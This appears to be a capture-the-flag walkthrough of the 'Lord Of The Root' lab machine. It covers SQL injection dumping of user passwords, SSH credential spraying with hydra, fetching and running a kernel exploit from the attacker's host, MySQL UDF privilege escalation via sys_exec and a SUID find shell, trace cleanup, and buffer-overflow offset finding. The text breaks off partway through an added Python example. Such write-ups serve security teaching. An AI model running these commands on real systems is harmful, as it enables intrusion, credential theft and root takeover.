back-end DBMS: MySQL >= 5.0.12
[22:17:00] [INFO] fetching columns 'id, password, username' for table 'Users' in database 'Webapp'
[22:17:00] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[22:17:00] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[22:17:15] [INFO] adjusting time delay to 1 second due to good response times
3
[22:17:15] [INFO] retrieved: id
[22:17:21] [INFO] resumed: int(10)
[22:17:21] [INFO] retrieved: username
[22:17:43] [INFO] resumed: varchar(255)
[22:17:43] [INFO] retrieved: password
[22:18:11] [INFO] resumed: varchar(255)
Database: Webapp
Table: Users
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(10) |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

[22:18:11] [INFO] sqlmap will dump entries of all tables from all databases now
[22:18:11] [INFO] fetching tables for database: 'Webapp'
[22:18:11] [INFO] fetching number of tables for database 'Webapp'
[22:18:11] [INFO] resumed: 1
[22:18:11] [INFO] resumed: Users
[22:18:11] [INFO] fetching columns for table 'Users' in database 'Webapp'
[22:18:11] [INFO] resumed: 3
[22:18:11] [INFO] resumed: id
[22:18:11] [INFO] resumed: username
[22:18:11] [INFO] resumed: password
[22:18:11] [INFO] fetching entries for table 'Users' in database 'Webapp'
[22:18:11] [INFO] fetching number of entries for table 'Users' in database 'Webapp'
[22:18:11] [INFO] retrieved: 5
[22:18:13] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
1
[22:18:15] [INFO] retrieved: iwilltakethering
[22:19:04] [INFO] retrieved: frodo
[22:19:23] [INFO] retrieved: 2
[22:19:26] [INFO] retrieved: MyPreciousR00t
[22:20:13] [INFO] retrieved: smeagol
[22:20:34] [INFO] retrieved: 3
[22:20:37] [INFO] retrieved: AndMySword
[22:21:15] [INFO] retrieved: aragorn
[22:21:35] [INFO] retrieved: 4
[22:21:39] [INFO] retrieved: AndMyBow
[22:22:10] [INFO] retrieved: legolas
[22:22:33] [INFO] retrieved: 5
[22:22:36] [INFO] retrieved: AndMyAxe
[22:23:05] [INFO] retrieved: gimli
Database: Webapp
Table: Users
[5 entries]
+----+------------------+----------+
| id | password | username |
+----+------------------+----------+
| 1 | iwilltakethering | frodo |
| 2 | MyPreciousR00t | smeagol |
| 3 | AndMySword | aragorn |
| 4 | AndMyBow | legolas |
| 5 | AndMyAxe | gimli |
+----+------------------+----------+

[22:23:20] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.116.196/dump/Webapp/Users.csv'
[22:23:20] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-11132022_1017pm.csv'
[22:23:20] [WARNING] your sqlmap version is outdated


SSH

The dump is plainly a set of user accounts; they are either for the web login or for SSH, so I sprayed them at SSH. (As it turns out, smeagol's database password is also his SSH password.)

hydra

Make sure each wordlist ends with a newline. Hydra reports l:5/p:6, one password more than the five dumped, so p.txt carries an extra line worth checking. Hydra also warns that SSH limits parallel sessions; -t 4 is the safer setting, particularly on a host that locks out after repeated failures.

└─# hydra -L u.txt -P p.txt 192.168.116.196 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-13 22:44:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:5/p:6), ~2 tries per task
[DATA] attacking ssh://192.168.116.196:22/
[22][ssh] host: 192.168.116.196 login: smeagol password: MyPreciousR00t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-13 22:44:19




Kernel privilege escalation

Routine enumeration: Ubuntu 14.04.3 on kernel 3.19.0-25 (i686), which has a direct kernel privilege escalation.

smeagol@LordOfTheRoot:~$ id
uid=1000(smeagol) gid=1000(smeagol) groups=1000(smeagol)
smeagol@LordOfTheRoot:~$ uname -a
Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 athlon i686 GNU/Linux
smeagol@LordOfTheRoot:~$ hostnamectl
Static hostname: LordOfTheRoot
Icon name: computer-vm
Chassis: vm
Boot ID: 5b76adc7b3ac43a7905747d9d010c81b
Operating System: Ubuntu 14.04.3 LTS
Kernel: Linux 3.19.0-25-generic
Architecture: i686
smeagol@LordOfTheRoot:~$

Search the exploit database for the distribution and kernel ("Ubuntu 14.04.3 exploit"). EDB 39166 is the overlayfs bug (CVE-2015-8660); the "Ubuntu 14.04" in its title is what matters for this 3.19 kernel. When there is a hit, copy it out of the local exploit-db mirror:

└─# searchsploit 39166            
---------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1) | linux/local/39166.c
---------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root㉿Tom)-[~/桌面/demo/Lord_Of_The_Root-1.0.1]
└─# searchsploit -m linux/local/39166.c
Exploit: Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)
URL: https://www.exploit-db.com/exploits/39166
Path: /usr/share/exploitdb/exploits/linux/local/39166.c
File Type: C source, ASCII text

Copied to: /root/桌面/demo/Lord_Of_The_Root-1.0.1/39166.c

┌──(root㉿Tom)-[~/桌面/demo/Lord_Of_The_Root-1.0.1]
└─# ls
39166.c p.txt u.txt

Fetched onto the target over HTTP from the attacking box (any static file server on 192.168.116.164:80 will do) and compiled with default flags, since the target has gcc. The chmod +x is redundant because gcc already produces an executable. The exploit gives euid 0 while keeping smeagol's gid, which is why id shows gid=1000.

smeagol@LordOfTheRoot:/tmp$ wget http://192.168.116.164/39166.c
--2022-11-13 08:11:20-- http://192.168.116.164/39166.c
Connecting to 192.168.116.164:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2680 (2.6K) [text/x-csrc]
Saving to: ‘39166.c’

100%[==================================================================================================>] 2,680 --.-K/s in 0s

2022-11-13 08:11:20 (238 MB/s) - ‘39166.c’ saved [2680/2680]

smeagol@LordOfTheRoot:/tmp$ ls
39166.c
smeagol@LordOfTheRoot:/tmp$ which gcc
/usr/bin/gcc
smeagol@LordOfTheRoot:/tmp$ gcc 39166.c -o demo && chmod +x demo
smeagol@LordOfTheRoot:/tmp$ ./demo
root@LordOfTheRoot:/tmp# id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)
root@LordOfTheRoot:/tmp#


UDF

The UDF route needs /usr/sbin/mysqld to be running as root, which ps confirms:

smeagol@LordOfTheRoot:/tmp$ ps aux | grep mysql
root 1182 0.0 4.2 327200 43444 ? Ssl 06:28 0:02 /usr/sbin/mysqld
smeagol 3766 0.0 0.1 4692 2048 pts/1 S+ 08:14 0:00 grep --color=auto mysql

dpkg is Ubuntu's package manager; it shows MySQL server 5.5.44:

smeagol@LordOfTheRoot:/tmp$ dpkg -l | grep mysql
ii libdbd-mysql-perl 4.025-1 i386 Perl5 database interface to the MySQL database
ii libmysqlclient18:i386 5.5.44-0ubuntu0.14.04.1 i386 MySQL database client library
ii mysql-client-5.5 5.5.44-0ubuntu0.14.04.1 i386 MySQL database client binaries
ii mysql-client-core-5.5 5.5.44-0ubuntu0.14.04.1 i386 MySQL database core client binaries
ii mysql-common 5.5.44-0ubuntu0.14.04.1 all MySQL database common files, e.g. /etc/mysql/my.cnf
ii mysql-server 5.5.44-0ubuntu0.14.04.1 all MySQL database server (metapackage depending on the latest version)
ii mysql-server-5.5 5.5.44-0ubuntu0.14.04.1 i386 MySQL database server binaries and system database setup
ii mysql-server-core-5.5 5.5.44-0ubuntu0.14.04.1 i386 MySQL database server binaries
ii php5-mysql 5.5.9+dfsg-1ubuntu4.11 i386 MySQL module for php5
rc php5-mysqlnd 5.5.9+dfsg-1ubuntu4.11 i386 MySQL module for php5 (Native Driver)
smeagol@LordOfTheRoot:/tmp$

That looks promising, so go straight to the configuration files and search them for credentials: cat * | grep -i -R "pass"

[email protected]:/var/www/978345210$ cat * | grep -i -R "pass"
index.php:<label>Password :</label>
index.php:<input id="password" name="password" placeholder="**********" type="password">
login.php: if (empty($_POST['username']) || empty($_POST['password'])) {
login.php: $error = "Username or Password is invalid";
login.php: // Define $username and $password
login.php: $password=$_POST['password'];
login.php: $password = stripslashes($password);
login.php: $sql="select username, password from Users where username='".$username."' AND password='".$password."';";

$db = new mysqli('localhost', 'root', 'darkshadow', 'Webapp');

With the credentials from that line, log in to MySQL.

[email protected]:/var/www/978345210$ mysql -uroot -pdarkshadow
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1392
Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>


Check whether the preconditions are met

  • If secure_file_priv is NULL, mysqld is not allowed to import or export files, so privilege escalation is not possible

  • If secure_file_priv is /tmp/, mysqld may only import and export under /tmp/, so escalation is not possible either

  • If secure_file_priv has no value (empty), mysqld's import and export are unrestricted, so escalation is possible!

  • For MySQL >= 5.1, the UDF shared library must be placed in the lib\plugin folder under the MySQL installation directory before a user-defined function can be created

Here the condition allows writing to any location, but we ourselves only have write permission under /tmp; note that secure_file_priv is empty rather than NULL.

mysql> show global variables like 'secure%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_auth | OFF |
| secure_file_priv | |
+------------------+-------+
2 rows in set (0.00 sec)

mysql> show variables like '%plugin%';
+---------------+------------------------+
| Variable_name | Value |
+---------------+------------------------+
| plugin_dir | /usr/lib/mysql/plugin/ |
+---------------+------------------------+
1 row in set (0.00 sec)

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select user,host from user;
+------------------+---------------+
| user | host |
+------------------+---------------+
| root | 127.0.0.1 |
| root | ::1 |
| debian-sys-maint | localhost |
| root | localhost |
| root | lordoftheroot |
+------------------+---------------+
5 rows in set (0.00 sec)
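An added defender-side check, not part of the original write-up: it parses the ASCII tables the mysql client prints (as in the SHOW VARIABLES and mysql.func output above) and applies the secure_file_priv rules from the bullet list, then flags registered UDFs whose names match lib_mysqludf_sys. The sample tables are constructed from the values shown on this page.

```python
"""Audit MySQL output for the UDF preconditions listed above.

Added example, not part of the original write-up. It parses the ASCII tables
the mysql client prints (SHOW VARIABLES, SELECT FROM mysql.func), applies
the secure_file_priv rules from the bullet list, and flags registered UDFs
whose names match lib_mysqludf_sys. Sample tables are constructed from the
values shown on the page.
"""

# Constructed sample output in the mysql client's table format.
SHOW_SECURE = """
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | OFF   |
| secure_file_priv |       |
+------------------+-------+
"""

SHOW_PLUGIN = """
+---------------+------------------------+
| Variable_name | Value                  |
+---------------+------------------------+
| plugin_dir    | /usr/lib/mysql/plugin/ |
+---------------+------------------------+
"""

FUNC_TABLE = """
+----------+-----+-------+----------+
| name     | ret | dl    | type     |
+----------+-----+-------+----------+
| sys_exec | 0   | aa.so | function |
+----------+-----+-------+----------+
"""

# Function names exported by lib_mysqludf_sys (listed later in the write-up).
LIB_MYSQLUDF_SYS = {"sys_eval", "sys_exec", "sys_get", "sys_set"}


def parse_mysql_table(text):
    """Convert a mysql-client ASCII table into a list of {header: cell} dicts."""
    rows = [ln.strip() for ln in text.splitlines() if ln.strip().startswith("|")]
    cells = [[c.strip() for c in ln.strip("|").split("|")] for ln in rows]
    header, body = cells[0], cells[1:]
    return [dict(zip(header, row)) for row in body]


def variables(text):
    """SHOW VARIABLES output -> {Variable_name: Value}."""
    return {r["Variable_name"]: r["Value"] for r in parse_mysql_table(text)}


def secure_file_priv_status(value):
    """Classify secure_file_priv exactly as the bullet list above does."""
    if value.upper() == "NULL":
        return "import/export disabled"
    if value == "":
        return "unrestricted: dumpfile can write into plugin_dir"
    return "restricted to " + value


def audit(show_secure, show_plugin, func_table):
    """Findings a defender would raise from the three query outputs."""
    sfp = variables(show_secure).get("secure_file_priv", "NULL")
    udfs = parse_mysql_table(func_table)
    return {
        "secure_file_priv": secure_file_priv_status(sfp),
        "plugin_dir": variables(show_plugin).get("plugin_dir", ""),
        # Empty secure_file_priv is the only setting under which
        # SELECT ... INTO DUMPFILE can drop a library into plugin_dir.
        "dumpfile_to_plugin_dir_possible": sfp == "",
        "registered_udfs": sorted(r["name"] for r in udfs),
        # Any mysql.func entry named like lib_mysqludf_sys deserves attention;
        # the dl column says which library file to inspect in plugin_dir.
        "suspicious_udfs": sorted(
            (r["name"], r["dl"]) for r in udfs if r["name"] in LIB_MYSQLUDF_SYS
        ),
    }


if __name__ == "__main__":
    for key, val in audit(SHOW_SECURE, SHOW_PLUGIN, FUNC_TABLE).items():
        print("%-32s %s" % (key, val))
```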

select * from mysql.user where user = substring_index(user(),'@',1)\G;

substring_index(<string to cut>, <delimiter character>, <occurrence N of the delimiter at which to cut>)

select @@basedir from dual;
show variables like '%compile%';

Additional background

In MySQL, a BLOB is a binary large object: a container that can hold a large amount of data of varying size. BLOB is really a family of types (TinyBlob, Blob, MediumBlob, LongBlob) that are identical except for the maximum amount of data they can store.

The four MySQL BLOB types

Type          Size (bytes)
TinyBlob      up to 255
Blob          up to 65K
MediumBlob    up to 16M
LongBlob      up to 4G

The command execution we invoke is provided by the functions in lib_mysqludf_sys:

  • sys_eval: executes an arbitrary command and returns its output

  • sys_exec: executes an arbitrary command and returns its exit code

  • sys_get: reads an environment variable

  • sys_set: creates or modifies an environment variable

Where the UDF libraries are stored; note which framework each path belongs to

/usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
/usr/share/sqlmap/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
/usr/share/sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
/usr/share/sqlmap/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.so
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll

Creating the function

The target is 32-bit Linux; after saving the library, download it into a directory on the target.

cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.so aa.so

--2022-11-13 09:09:17--  http://192.168.116.164/aa.so
Connecting to 192.168.116.164:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5696 (5.6K) [application/octet-stream]
Saving to: ‘aa.so’

100%[=======================================================================================================>] 5,696 --.-K/s in 0s

2022-11-13 09:09:17 (780 MB/s) - ‘aa.so’ saved [5696/5696]

[email protected]:/tmp$ ls
39166.c aa.so demo
[email protected]:/tmp$

mysql> use mysql
Database changed
mysql> create table aa( aa longblob);
Query OK, 0 rows affected (0.00 sec)

mysql> insert into aa values (load_file('/tmp/aa.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from aa into dumpfile '/usr/lib/mysql/plugin/aa.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function sys_exec returns string soname 'aa.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+----------+-----+-------+----------+
| name | ret | dl | type |
+----------+-----+-------+----------+
| sys_exec | 0 | aa.so | function |
+----------+-----+-------+----------+
1 row in set (0.00 sec)

mysql> select sys_exec('whoami');
+--------------------+
| sys_exec('whoami') |
+--------------------+
| NULL |
+--------------------+
1 row in set (0.00 sec)

mysql> select sys_exec('chmod u+s /usr/bin/find');
+-------------------------------------+
| sys_exec('chmod u+s /usr/bin/find') |
+-------------------------------------+
| NULL |
+-------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
[email protected]:/tmp$ find / -exec '/bin/sh' \;
# id
uid=1000(smeagol) gid=1000(smeagol) euid=0(root) groups=0(root),1000(smeagol)


Cleaning up traces

drop table {tables};

drop function {function name from mysql.func};


On Windows, when uploading the DLL, MySQL also accepts UNC network paths:

select load_file('\\\\127.0.0.1\\xxx\\lib_mysqludf_sys_64.dll') into dumpfile "F:\\xxxx\\mysql-5.7.26\\lib\\plugin\\lib_mysqludf_sys_64.dll";

Buffer

Check the SUID bits; the files with questionable permissions are door1 to door3, and they immediately catch the eye.

# find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 5150 Sep 22 2015 /root/buf
-rwsr-xr-x 1 root root 7370 Sep 17 2015 /root/other
-rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
-rwsr-xr-x 1 root root 35300 Jul 15 2015 /bin/su
-rwsr-xr-x 1 root root 88752 Aug 4 2015 /bin/mount
-rwsr-xr-x 1 root root 38932 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 67704 Aug 4 2015 /bin/umount
-rwsr-xr-x 1 root root 43316 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 5150 Sep 22 2015 /SECRET/door2/file
-rwsr-xr-x 1 root root 7370 Sep 17 2015 /SECRET/door1/file
-rwsr-xr-x 1 root root 7370 Sep 17 2015 /SECRET/door3/file
-rwsr-xr-x 1 root root 18168 Mar 4 2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 45420 Jul 15 2015 /usr/bin/passwd
-rwsr-xr-x 1 root root 35916 Jul 15 2015 /usr/bin/chsh
-rwsr-xr-x 1 root root 44620 Jul 15 2015 /usr/bin/chfn
-rwsr-xr-x 1 root root 66252 Jul 15 2015 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 30984 Jul 15 2015 /usr/bin/newgrp
-rwsr-xr-x 1 root lpadmin 13672 Jun 4 2015 /usr/bin/lppasswd
-rwsr-xr-x 1 root root 18136 May 7 2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 158404 Jan 6 2014 /usr/bin/find
-rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
-rwsr-xr-x 1 root root 156708 Mar 12 2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 9612 Feb 25 2015 /usr/lib/pt_chown
-rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd

Under /root there are several files: the source files and the compiled binaries.

#cd /root
# ls
buf buf.c Flag.txt other other.c switcher.py

Let's dissect the source. switcher.py generates a random value, luckyDoor, and places the binaries according to it.

# cat switcher.py
#!/usr/bin/python
import os
from random import randint

targets= ["/SECRET/door1/","/SECRET/door2/","/SECRET/door3/"]
# every door first gets a copy of the harmless binary, renamed to "file"
for t in targets:
    os.system("rm "+t+"*")
    os.system("cp -p other "+t)
    os.system("cp -p "+t+"other "+t+"file")
    os.system("rm "+t+"other")

# one randomly chosen door gets the vulnerable binary instead
luckyDoor = randint(0,2)
t=targets[luckyDoor]
os.system("rm "+t+"*")
os.system("cp -p buf "+t)
os.system("cp -p "+t+"buf "+t+"file")
os.system("rm "+t+"buf")


Vulnerability analysis

Note strcpy here: the function performs no length check while copying the string, so an over-long string overflows the buffer.

char *strcpy(char *dest, const char *src)
  • dest -- pointer to the destination array that receives the copied content.

  • src -- the string to copy

This source copies the argument received via argv into buff, which was allocated only 159 bytes; anything longer triggers the buffer overflow.

#include <string.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]){

    char buff[159];
    if(argc <2){
        printf("Syntax: %s <input string>\n", argv[0]);
        exit (0);

    }
    strcpy(buff, argv[1]);
    return 0;

}

This one just returns immediately without doing anything else.

#include <string.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]){

    char buff[150];
    if(argc <2){
        printf("Syntax: %s <input string>\n", argv[0]);
        exit (0);

    }
    //This Program does nothing
    return 0;

}


Debugging

Suppose we build an application that we interact with by typing commands into it. The feature only ever needs 20 letters, so we set the space that stores user input to 20 bytes. But someone dishonest types in 24 letters: the space fills up, the remaining four letters still have to go somewhere, and they end up overwriting the contents of the EIP register (when the buffer is full, EIP is the first thing to be overwritten). EIP holds the address of the next instruction to execute, so by changing the last four of those 24 letters we change EIP, and we control which instruction runs next. If we instead send 2400 characters, far more than EIP is overwritten, and we can replace part of those 2400 characters with our own malicious code. When the application receives those 2400 characters carrying the code, we find where the code was stored, point EIP at that location, and the code executes. (Without any buffer overflow protection, every time we send those 2400 characters they land at the same place in memory, which is why we can pinpoint where our shellcode sits.)

To defend against buffer overflows, both Windows and Linux have added protections, such as the ASLR encountered on this box:

  1. A security technique against buffer overflows: it randomizes the layout of the heap, stack, shared-library mappings and other linear regions, making it harder for the attacker to predict the target address and locate the attack code directly, and so prevents the overflow attack

  2. The purpose of this technique is to make the location of our malicious code unpredictable, so that we cannot execute it

  3. As for bypassing it, we fight fire with fire; the concrete method follows below

  4. The files with the buffer overflow live under /SECRET in the root directory. First look at their file information; either of the following two methods works

    1. Check ASLR:

       1. cat /proc/sys/kernel/randomize_va_space (returns 2)

       2. sysctl -a --pattern randomize (returns 2)

    2. Configuration values:

       1. 0 = off

       2. 1 = partial randomization: shared libraries, stack, mmap() and the VDSO are randomized (note for later: PIE affects heap randomization)

       3. 2 = full randomization: everything in 1 plus the heap

    3. Check the randomness of the address space with ldd {file}; repeated runs give different results

Linux下关闭ASLR(地址空间随机化)的方法_counsellor的博客-CSDN博客_关闭地址随机化.pdf

We have now explained clearly why the vulnerability exists and how the random placement is implemented. Next we need to compare the sizes, or the MD5 values, of the three files.

[email protected]:/SECRET$ ll -alhR
.:
total 20K
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ./
drwxr-xr-x 23 root root 4.0K Sep 22 2015 ../
drwxr-xr-x 2 root root 4.0K Nov 13 09:57 door1/
drwxr-xr-x 2 root root 4.0K Nov 13 09:57 door2/
drwxr-xr-x 2 root root 4.0K Nov 13 09:57 door3/

./door1:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 09:57 ./
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ../
-rwsr-xr-x 1 root root 7.2K Sep 17 2015 file*

./door2:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 09:57 ./
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ../
-rwsr-xr-x 1 root root 7.2K Sep 17 2015 file*

./door3:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 09:57 ./
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ../
-rwsr-xr-x 1 root root 5.1K Sep 22 2015 file*

Here we can see that the one under ./door3 is clearly different, so we copy that file out for analysis. Use base64 to transfer the file, then decode it again.

base64 file    ---- convert the binary file to base64
Then paste the output into a text file: base64.txt
cat base64.txt | base64 -d > file --- convert the text file back into an executable

Comparing the MD5 values shows they are identical, which guarantees the file's integrity, so we can analyze it locally.

[email protected]:/SECRET/door3$ md5sum file 
bb0e0e4439b5039e71405f8a1b6d5c0c file

─# md5sum flie
bb0e0e4439b5039e71405f8a1b6d5c0c flie

The crash occurs at 171 characters; that is the boundary. Next we need to locate the memory address.

┌──(root㉿Tom)-[~/桌面/demo/Lord_Of_The_Root-1.0.1]
└─# ./file $(python2 -c 'print "A"*170')

┌──(root㉿Tom)-[~/桌面/demo/Lord_Of_The_Root-1.0.1]
└─# ./file $(python2 -c 'print "A"*171')

zsh: segmentation fault ./file $(python2 -c 'print "A"*171')


Overflow

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000   (used to locate the offset)

We already know where the crash occurs; now we use a pattern as padding to locate the exact position that lands in EIP, so that we can control our shellcode precisely.

└─# gdb -q file
Reading symbols from file...
(No debugging symbols found in file)
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Starting program: /root/桌面/demo/Lord_Of_The_Root-1.0.1/file Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x41376641 in ?? ()

Locating the offset also confirms that 171 is our boundary.

└─# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41376641
[*] Exact match at offset 171
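The cyclic pattern behind pattern_create.rb and pattern_offset.rb, re-implemented as an added example (not Metasploit's own code): it reproduces the offset 171 from the faulting EIP value 0x41376641 shown in the gdb session above.

```python
"""The cyclic pattern behind pattern_create.rb / pattern_offset.rb.

Added example, not Metasploit's code. The pattern cycles upper-case letter,
lower-case letter, digit ("Aa0Aa1..."), so every 4-byte window is unique
within the first 20280 bytes. x86 is little-endian, so the EIP value gdb
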